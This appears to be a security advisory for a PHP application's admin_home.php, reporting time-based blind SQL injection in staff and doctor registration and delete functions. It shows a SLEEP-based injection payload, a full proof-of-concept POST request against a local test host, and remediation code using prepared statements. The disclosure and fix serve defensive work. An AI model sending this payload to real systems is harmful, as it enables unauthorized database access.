KhanhCM (@khanhchauminh)
Example payload:
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
POST /admin_home.php HTTP/1.1
Host: 127.0.0.1:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/admin_home.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jb2naa6oef92cak3bcohm1dus1
Connection: close

afullname=staff1'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&aemail=staff1%40example.com&apassword=password
Validate input of all vulnerable parameters in admin_home.php.
admin_home.php
Version: 1.0
Vulnerable parameters
Staff Registration:
Doctor Registration:
Delete Clerks:
Delete Doctor:
Steps to reproduce
Example payload:
Proof-of-concept
Response in Burpsuite
Source code review
admin_home.php
library.php
Remediation
Validate input of all vulnerable parameters in admin_home.php.
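As an added example of the remediation above (not code from the reported project), the Staff Registration handler rewritten so that the afullname, aemail and apassword fields from the request are validated and then passed to MySQL through a prepared statement; the table name staff, its columns, and an already-open mysqli connection $conn are assumptions. The same pattern applies to the Doctor Registration and delete handlers listed under vulnerable parameters.

```php
<?php
// Added example, not the project's code. Assumed schema: table `staff`
// with columns fullname, email, password; $conn is an open mysqli handle.
//
// The injection fix is the prepared statement: afullname is bound as data,
// so a value such as ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
// is stored as a literal string and never interpreted as SQL.

function register_staff(mysqli $conn, array $post): array
{
    $fullname = trim($post['afullname'] ?? '');
    $email    = trim($post['aemail'] ?? '');
    $password = $post['apassword'] ?? '';

    // Input validation: reject what the form never needs. This reduces the
    // attack surface but is not sufficient on its own against injection.
    if ($fullname === '' || mb_strlen($fullname) > 100) {
        return ['ok' => false, 'error' => 'Invalid full name'];
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return ['ok' => false, 'error' => 'Invalid email address'];
    }
    if (strlen($password) < 8) {
        return ['ok' => false, 'error' => 'Password too short'];
    }

    // Store a password hash, never the plaintext value from the form.
    $hash = password_hash($password, PASSWORD_DEFAULT);

    // Query structure is fixed before any user data reaches the server;
    // the placeholders are filled by the driver, not by string concatenation.
    $stmt = $conn->prepare(
        'INSERT INTO staff (fullname, email, password) VALUES (?, ?, ?)'
    );
    if ($stmt === false) {
        return ['ok' => false, 'error' => 'Database error'];
    }
    $stmt->bind_param('sss', $fullname, $email, $hash);
    $ok = $stmt->execute();
    $stmt->close();

    return ['ok' => $ok, 'error' => $ok ? null : 'Insert failed'];
}

// Usage from the POST handler in admin_home.php (assumed $conn):
// $result = register_staff($conn, $_POST);
```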